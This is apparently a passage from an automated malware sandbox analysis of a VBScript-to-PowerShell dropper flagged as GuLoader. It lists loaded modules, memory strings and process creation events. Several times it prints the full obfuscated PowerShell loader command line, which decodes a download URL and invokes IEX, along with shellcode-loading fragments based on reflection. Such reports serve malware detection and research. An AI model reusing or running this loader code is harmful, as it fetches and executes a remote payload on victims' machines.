Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source:	Binary string: System.Core.pdb122658-3693405117-2476756634-1003_Classes\WOW6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32U source: powershell.exe, 00000005.00000002.2427817287.00000000007AF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb` source: WERC57C.tmp.dmp.11.dr
Source:	Binary string: mscorlib.pdb source: WERC57C.tmp.dmp.11.dr
Source:	Binary string: notepad.pdbGCTL source: wscript.exe, 00000000.00000003.2033699414.00000192E5E01000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2030985860.00000192E5C01000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Crustaceology (Virksomhedskategoris 'Fo p$,reag raglNatio.ratb Anta hollUnja:AddiIAtommK,mmpFokua,orec laitSpe,=Adre[ roeTSkriy Grap emeHo,n]Whee:Bids:MellGForme kretd lkTRetiyCalapSalme RepFArrar St oRab,mFo,eCIndkLPracSLiefIWe.pDBoll(Seli$AcciS evet SuraMil tS,nssF rtg Hyda nulr ardaV ndnEmbrtTappepitar UnieVic tH ml)Talb ') source: powershell.exe, 00000002.00000002.2263730437.000002E06D908000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2229676697.000002E05DC42000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2263730437.000002E06D66F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2229676697.000002E05DF2D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2430583673.0000000004496000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2457764685.00000000053B4000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: Fo p$,reag raglNatio.ratb Anta hollUnja:AddiIAtommK,mmpFokua,orec laitSpe,=Adre[ roeTSkriy Grap emeHo,n]Whee:Bids:MellGForme kretd lkTRetiyCalapSalme RepFArrar St oRab,mFo,eCIndkLPracSLiefIWe.pDBoll(Seli$AcciS evet SuraMil tS,nssF rtg Hyda nulr ardaV ndnEmbrtTappepitar UnieVic tH ml)Talb source: powershell.exe, 00000005.00000002.2430583673.0000000004496000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: m.Core.pdb4 source: powershell.exe, 00000005.00000002.2463994877.0000000006E01000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdb source: WERC57C.tmp.dmp.11.dr
Source:	Binary string: aqm.Core.pdbcy source: powershell.exe, 00000005.00000002.2463994877.0000000006E01000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdbRSDS source: WERC57C.tmp.dmp.11.dr
Source:	Binary string: Fo p$,reag raglNatio.ratb Anta hollUnja:AddiIAtommK,mmpFokua,orec laitSpe,=Adre[ roeTSkriy Grap emeHo,n]Whee:Bids:MellGForme kretd lkTRetiyCalapSalme RepFArrar St oRab,mFo,eCIndkLPracSLiefIWe.pDBoll(Seli$AcciS evet SuraMil tS,nssF rtg Hyda nulr ardaV ndnEmbrtTappepitar UnieVic tH ml)Talb X source: powershell.exe, 00000002.00000002.2229676697.000002E05DC42000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.Management.Automation.pdb-2476756634-1003_Classes\WOW6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocHandler32405117-2476756634-10038 source: powershell.exe, 00000005.00000002.2427817287.00000000007AF000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

VBScript performs obfuscated calls to suspicious functions

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: .Run("powershell "<#Bldningsforstyrrelser Bushwhacked Rkebiskoppers Johnsen Inkompetencers Urubu Brandsikkerheden #>;$O", "Unsupported parameter type 00000000")

Yara detected GuLoader

Source: Yara match	File source: 00000005.00000002.2472762628.0000000009395000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2472491841.00000000081C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2457764685.00000000053B4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2263730437.000002E06D66F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String($demitrain)$global:Kovendingens = [System.Text.Encoding]::ASCII.GetString($Tricuspidate)$global:Misomath190=$Kovendingens.substring($Relinquishers,$Henvejres)<#Upsnatch Fremmedpolitis
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((skolepsykologer $Eksperimenteltnretterfade $Makropakkers), (Staldkaades @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Nonnormally = [AppDomain]::CurrentD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Truels)), $Uncivilizing).DefineDynamicModule($Handouts, $false).DefineType($Nonpartial203, $Kirkebnnernes, [System.MulticastDelegate])
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String($demitrain)$global:Kovendingens = [System.Text.Encoding]::ASCII.GetString($Tricuspidate)$global:Misomath190=$Kovendingens.substring($Relinquishers,$Henvejres)<#Upsnatch Fremmedpolitis

Suspicious powershell command line found

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Bldningsforstyrrelser Bushwhacked Rkebiskoppers Johnsen Inkompetencers Urubu Brandsikkerheden #>;$Ottetals='bluett';<#Samkvemsrets Polydactylous Skemaden Vkstcentret Forsorgslederens #>;$Erstatningspligts40=$host.PrivateData;If ($Erstatningspligts40) {$Skallesmkkernes++;}function Virksomhedskategoris($Molossian){$Arbejdsdatabasen=$knsttelserne+$Molossian.Length-$Skallesmkkernes;for( $Nedsivningsbekendtgrelsers=4;$Nedsivningsbekendtgrelsers -lt $Arbejdsdatabasen;$Nedsivningsbekendtgrelsers+=5){$Shaftment='Refrygtigere';$Udlaanssal+=$Molossian[$Nedsivningsbekendtgrelsers];}$Udlaanssal;}function Crustaceology($Afdelingsingenirers){ & ($Ileitis) ($Afdelingsingenirers);}$Aarstalslisters=Virksomhedskategoris 'Rea.MRedaoRsonzVariiUddrlEddelBedaaTrip/ Des5Abso. Pi.0 Pie Knu(Bl,eW nciiFoalnSterdD meoT.mtw,ispsAl a SubiN.andTgald Fatu1Tud 0 Inu. Tr 0 Ser;data UnnoWSubsiharvnOtos6Doug4Folk;roko S,rexf,er6St.l4Mani;Pri SenrDermvBeha:Skav1Nuns2Libe1Trib.Co a0Fo k) S.i SejGI treBillcAudakFr.ioTyra/Ku s2Misk0Ops 1Ebra0 Ka 0Vari1Bar,0Biot1Taxa Ls nFWooli rbernor e GulfUdnyoRefexButi/U,ny1 Eft2Malc1 De .Pant0Besr ';$Hjlpemenuen=Virksomhedskategoris 'VibrUSignsCh tEPrieRN pt-F ypaFngsGA,ceERadinSamftSkre ';$Stolet111=Virksomhedskategoris 'La,ehPremtSchit Afkpsteds Sod: Ran/Ulid/Sv edD.sarP.eciBrudvSupeeMiso. scagTreeoSpiroA,sugBe klThoreFr.g. daac StaopaulmRavn/ VanuPrioc.pal? AfpeTegnxDodep StioMyrirgu rtRuna=Nos d ,taoPoppwMed nE enlJerno AndaP podSush&CrimiMaandPaga=Comp1Gamm0Spekm hoSWag dP esA Thr5Vill8 R ntG,grH ondF SupDPrio2MiljBv ndo amguHustrOzonBSpec_ Ce wFolkMAfskx ejlOvervBenzC Old-.lefLAfsvJ Jinj,oppwGa.orOutp4UlemRPiaz ';$Skovvogns134=Virksomhedskategoris 'E.ke>Razo ';$Ileitis=Virksomhedskategoris 'ProsiAbsceOut,X D s ';$Historicoreligious='Maffia';$Ornerily='\Nonpunctuating.sem';Crustaceology (Virksomhedskategoris 'unde$ Ti gSnkelOmsto ParbOli a TillAwig:.ranSGry,a HalnKnapd Brue erts L d= Und$TegneTropnTro,vG,ld:KunsaAst pAfmepSmaldExscahomotRistaMicr+Trom$NormO NatrKontnProaeArberRegei SullNonayKons ');Crustaceology (Virksomhedskategoris ' I,t$sinugSamalSkolo Befb Unsa Misl Int: ykvSOr gnudv.uSnadd gnoeBillsTri kHemoaMormf S,etPenneKrent NorsO.os= Ott$Di.iSCr,wtPalsoGrunlIncoeA,tetU de1Bilb1 ra1Trif.Sirss RappApprl Proir kot Nu (Mole$ChinS TrekStraoHo evAghovYngsoOvergP.ernAccrs Dia1Igno3R gr4Flum) ear ');Crustaceology (Virksomhedskategoris ' Con[ Tc NRadieS,avtArbi.PalaSUdsmeU rira kuvArsei AntcKomme AboPNoneo triTeran CaltJackMSnu a ,kan .oraGen.g syeNongr bli] irt:Ove :BefeS Ma.e FigcPolyu Dy rHypeiSpi.tFl wyDeklPisoarGrdeo PentCiteoMinic Frio InklStro Unra= Tyn Hydr[BradN Be eClust Ana.Do.aSCephe RedcbesvuTer rRomaiSig t EntySkumPDis r EntoPrestUdbuoHelicRetvoM.ndlD,unTKondyT rep OuteSka ]Date:Sync:KretTMasslPo ys G.a1Appe2Flyg ');$Stolet111=$Snudeskaftets[0];$Gennemboring=(Virksomhedskategoris ' Div$ MllgFarfL
Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Bldningsforstyrrelser Bushwhacked Rkebiskoppers Johnsen Inkompetencers Urubu Brandsikkerheden #>;$Ottetals='bluett';<#Samkvemsrets Polydactylous Skemaden Vkstcentret Forsorgslederens #>;$Erstatningspligts40=$host.PrivateData;If ($Erstatningspligts40) {$Skallesmkkernes++;}function Virksomhedskategoris($Molossian){$Arbejdsdatabasen=$knsttelserne+$Molossian.Length-$Skallesmkkernes;for( $Nedsivningsbekendtgrelsers=4;$Nedsivningsbekendtgrelsers -lt $Arbejdsdatabasen;$Nedsivningsbekendtgrelsers+=5){$Shaftment='Refrygtigere';$Udlaanssal+=$Molossian[$Nedsivningsbekendtgrelsers];}$Udlaanssal;}function Crustaceology($Afdelingsingenirers){ & ($Ileitis) ($Afdelingsingenirers);}$Aarstalslisters=Virksomhedskategoris 'Rea.MRedaoRsonzVariiUddrlEddelBedaaTrip/ Des5Abso. Pi.0 Pie Knu(Bl,eW nciiFoalnSterdD meoT.mtw,ispsAl a SubiN.andTgald Fatu1Tud 0 Inu. Tr 0 Ser;data UnnoWSubsiharvnOtos6Doug4Folk;roko S,rexf,er6St.l4Mani;Pri SenrDermvBeha:Skav1Nuns2Libe1Trib.Co a0Fo k) S.i SejGI treBillcAudakFr.ioTyra/Ku s2Misk0Ops 1Ebra0 Ka 0Vari1Bar,0Biot1Taxa Ls nFWooli rbernor e GulfUdnyoRefexButi/U,ny1 Eft2Malc1 De .Pant0Besr ';$Hjlpemenuen=Virksomhedskategoris 'VibrUSignsCh tEPrieRN pt-F ypaFngsGA,ceERadinSamftSkre ';$Stolet111=Virksomhedskategoris 'La,ehPremtSchit Afkpsteds Sod: Ran/Ulid/Sv edD.sarP.eciBrudvSupeeMiso. scagTreeoSpiroA,sugBe klThoreFr.g. daac StaopaulmRavn/ VanuPrioc.pal? AfpeTegnxDodep StioMyrirgu rtRuna=Nos d ,taoPoppwMed nE enlJerno AndaP podSush&CrimiMaandPaga=Comp1Gamm0Spekm hoSWag dP esA Thr5Vill8 R ntG,grH ondF SupDPrio2MiljBv ndo amguHustrOzonBSpec_ Ce wFolkMAfskx ejlOvervBenzC Old-.lefLAfsvJ Jinj,oppwGa.orOutp4UlemRPiaz ';$Skovvogns134=Virksomhedskategoris 'E.ke>Razo ';$Ileitis=Virksomhedskategoris 'ProsiAbsceOut,X D s ';$Historicoreligious='Maffia';$Ornerily='\Nonpunctuating.sem';Crustaceology (Virksomhedskategoris 'unde$ Ti gSnkelOmsto ParbOli a TillAwig:.ranSGry,a HalnKnapd Brue erts L d= Und$TegneTropnTro,vG,ld:KunsaAst pAfmepSmaldExscahomotRistaMicr+Trom$NormO NatrKontnProaeArberRegei SullNonayKons ');Crustaceology (Virksomhedskategoris ' I,t$sinugSamalSkolo Befb Unsa Misl Int: ykvSOr gnudv.uSnadd gnoeBillsTri kHemoaMormf S,etPenneKrent NorsO.os= Ott$Di.iSCr,wtPalsoGrunlIncoeA,tetU de1Bilb1 ra1Trif.Sirss RappApprl Proir kot Nu (Mole$ChinS TrekStraoHo evAghovYngsoOvergP.ernAccrs Dia1Igno3R gr4Flum) ear ');Crustaceology (Virksomhedskategoris ' Con[ Tc NRadieS,avtArbi.PalaSUdsmeU rira kuvArsei AntcKomme AboPNoneo triTeran CaltJackMSnu a ,kan .oraGen.g syeNongr bli] irt:Ove :BefeS Ma.e FigcPolyu Dy rHypeiSpi.tFl wyDeklPisoarGrdeo PentCiteoMinic Frio InklStro Unra= Tyn Hydr[BradN Be eClust Ana.Do.aSCephe RedcbesvuTer rRomaiSig t EntySkumPDis r EntoPrestUdbuoHelicRetvoM.ndlD,unTKondyT rep OuteSka ]Date:Sync:KretTMasslPo ys G.a1Appe2Flyg ');$Stolet111=$Snudeskaftets[0];$Gennemboring=(Virksomhedskategoris ' Div$ MllgFarfL
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Bldningsforstyrrelser Bushwhacked Rkebiskoppers Johnsen Inkompetencers Urubu Brandsikkerheden #>;$Ottetals='bluett';<#Samkvemsrets Polydactylous Skemaden Vkstcentret Forsorgslederens #>;$Erstatningspligts40=$host.PrivateData;If ($Erstatningspligts40) {$Skallesmkkernes++;}function Virksomhedskategoris($Molossian){$Arbejdsdatabasen=$knsttelserne+$Molossian.Length-$Skallesmkkernes;for( $Nedsivningsbekendtgrelsers=4;$Nedsivningsbekendtgrelsers -lt $Arbejdsdatabasen;$Nedsivningsbekendtgrelsers+=5){$Shaftment='Refrygtigere';$Udlaanssal+=$Molossian[$Nedsivningsbekendtgrelsers];}$Udlaanssal;}function Crustaceology($Afdelingsingenirers){ & ($Ileitis) ($Afdelingsingenirers);}$Aarstalslisters=Virksomhedskategoris 'Rea.MRedaoRsonzVariiUddrlEddelBedaaTrip/ Des5Abso. Pi.0 Pie Knu(Bl,eW nciiFoalnSterdD meoT.mtw,ispsAl a SubiN.andTgald Fatu1Tud 0 Inu. Tr 0 Ser;data UnnoWSubsiharvnOtos6Doug4Folk;roko S,rexf,er6St.l4Mani;Pri SenrDermvBeha:Skav1Nuns2Libe1Trib.Co a0Fo k) S.i SejGI treBillcAudakFr.ioTyra/Ku s2Misk0Ops 1Ebra0 Ka 0Vari1Bar,0Biot1Taxa Ls nFWooli rbernor e GulfUdnyoRefexButi/U,ny1 Eft2Malc1 De .Pant0Besr ';$Hjlpemenuen=Virksomhedskategoris 'VibrUSignsCh tEPrieRN pt-F ypaFngsGA,ceERadinSamftSkre ';$Stolet111=Virksomhedskategoris 'La,ehPremtSchit Afkpsteds Sod: Ran/Ulid/Sv edD.sarP.eciBrudvSupeeMiso. scagTreeoSpiroA,sugBe klThoreFr.g. daac StaopaulmRavn/ VanuPrioc.pal? AfpeTegnxDodep StioMyrirgu rtRuna=Nos d ,taoPoppwMed nE enlJerno AndaP podSush&CrimiMaandPaga=Comp1Gamm0Spekm hoSWag dP esA Thr5Vill8 R ntG,grH ondF SupDPrio2MiljBv ndo amguHustrOzonBSpec_ Ce wFolkMAfskx ejlOvervBenzC Old-.lefLAfsvJ Jinj,oppwGa.orOutp4UlemRPiaz ';$Skovvogns134=Virksomhedskategoris 'E.ke>Razo ';$Ileitis=Virksomhedskategoris 'ProsiAbsceOut,X D s ';$Historicoreligious='Maffia';$Ornerily='\Nonpunctuating.sem';Crustaceology (Virksomhedskategoris 'unde$ Ti gSnkelOmsto ParbOli a TillAwig:.ranSGry,a HalnKnapd Brue erts L d= Und$TegneTropnTro,vG,ld:KunsaAst pAfmepSmaldExscahomotRistaMicr+Trom$NormO NatrKontnProaeArberRegei SullNonayKons ');Crustaceology (Virksomhedskategoris ' I,t$sinugSamalSkolo Befb Unsa Misl Int: ykvSOr gnudv.uSnadd gnoeBillsTri kHemoaMormf S,etPenneKrent NorsO.os= Ott$Di.iSCr,wtPalsoGrunlIncoeA,tetU de1Bilb1 ra1Trif.Sirss RappApprl Proir kot Nu (Mole$ChinS TrekStraoHo evAghovYngsoOvergP.ernAccrs Dia1Igno3R gr4Flum) ear ');Crustaceology (Virksomhedskategoris ' Con[ Tc NRadieS,avtArbi.PalaSUdsmeU rira kuvArsei AntcKomme AboPNoneo triTeran CaltJackMSnu a ,kan .oraGen.g syeNongr bli] irt:Ove :BefeS Ma.e FigcPolyu Dy rHypeiSpi.tFl wyDeklPisoarGrdeo PentCiteoMinic Frio InklStro Unra= Tyn Hydr[BradN Be eClust Ana.Do.aSCephe RedcbesvuTer rRomaiSig t EntySkumPDis r EntoPrestUdbuoHelicRetvoM.ndlD,unTKondyT rep OuteSka ]Date:Sync:KretTMasslPo ys G.a1Appe2Flyg ');$Stolet111=$Snudeskaftets[0];$Gennemboring=(Virksomhedskategoris ' Div$ MllgFarfL	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FF848D5F100 push eax; retf	2_2_00007FF848D5F10D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FF848D516C9 pushfd ; ret	2_2_00007FF848D516FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FF848D500BD pushad ; iretd	2_2_00007FF848D500C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FF848E279C9 push ebx; ret	2_2_00007FF848E279CA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00B843BB push es; ret	5_2_00B843CA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00B844FB push cs; ret	5_2_00B8450A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00B8445B push cs; ret	5_2_00B844FA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00B86F70 pushfd ; rep ret	5_2_00B86F89
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_06F72688 push 07C36A30h; ret	5_2_06F726AE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_06F72940 push 07C338FCh; ret	5_2_06F72966

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
